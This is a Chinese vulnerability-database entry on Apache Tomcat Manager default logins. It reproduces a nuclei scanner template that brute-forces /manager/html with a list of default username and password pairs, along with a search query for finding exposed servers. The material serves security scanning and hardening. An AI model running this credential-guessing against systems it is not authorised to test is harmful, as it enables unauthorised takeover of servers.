漏洞信息
漏洞名称: Apache Tomcat Manager Default Login
漏洞类型: 弱口令
漏洞等级: 高危
漏洞描述: Apache Tomcat是一个广泛使用的开源Web服务器和Servlet容器,支持Java Servlet和JavaServer Pages (JSP)技术,常用于企业级Web应用的部署。由于其广泛的应用,Tomcat的安全性尤为重要。该漏洞涉及Tomcat管理器界面的默认登录凭证问题,攻击者可以利用这些默认凭证未经授权访问管理界面。漏洞的技术根源在于系统部署时未更改默认的用户名和密码,或者使用了常见的弱密码组合。这种情况通常发生在管理员未遵循安全最佳实践,如更改默认凭证或实施强密码策略。攻击者通过尝试这些默认或弱密码组合,可以成功登录到Tomcat的管理界面,进而执行恶意操作,如部署恶意Web应用、查看敏感信息或控制服务器。由于管理界面具有高级权限,此类漏洞的利用可能导致严重的安全后果,包括服务器完全被控制。值得注意的是,这种攻击不需要复杂的技巧,且可以自动化执行,使得风险进一步加大。因此,管理员应立即更改默认凭证,并实施强密码策略,以减轻此类风险。
产品厂商: apache
产品名称: tomcat
影响版本: *
搜索语法: title:”Apache Tomcat”
来源: https://github.com/projectdiscovery/nuclei-templates/blob/d694ffeb6baa526904249ded765790e5726c0b03/http%2Fdefault-logins%2Fapache%2Ftomcat-default-login.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117
| id: tomcat-default-login
info: name: Apache Tomcat Manager Default Login author: pdteam,sinKettu,nybble04 severity: high description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations. reference: - https://www.rapid7.com/db/vulnerabilities/apache-tomcat-default-ovwebusr-password/ - https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt classification: cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: max-request: 406 vendor: apache product: tomcat shodan-query: title:"Apache Tomcat" tags: tomcat,apache,default-login
flow: http(1) && http(2)
http: - raw: - | GET /manager/html HTTP/1.1 Host: {{Hostname}}
matchers: - type: word words: - "Apache Tomcat" - "401 Unauthorized" condition: or internal: true
- raw: - | GET /manager/html HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}}
payloads: username: - ADMIN - QCC - admin - both - cxsdk - demo - j2deployer - manager - ovwebusr - role - role1 - root - server_admin - tomcat - xampp password: - ADMIN - OvW*busr1 - Password1 - QLogic66 - admanager - admin - adrole1 - adroot - ads3cret - adtomcat - advagrant - changethis - demo - j2deployer - kdsxc - manager - owaspbwa - password - password1 - r00t - role1 - root - s3cret - tomcat - toor - vagrant - xampp attack: clusterbomb # Available options: sniper, pitchfork and clusterbomb threads: 30
matchers-condition: and matchers: - type: word part: body words: - "Apache Tomcat" - "Server Information" condition: and
- type: word part: body words: - "Tomcat Version" - "JVM Version" - "JVM Vendor" - "OS Name" - "OS Version" - "OS Architecture" - "Hostname" - "IP Address" condition: or
- type: status status: - 200
|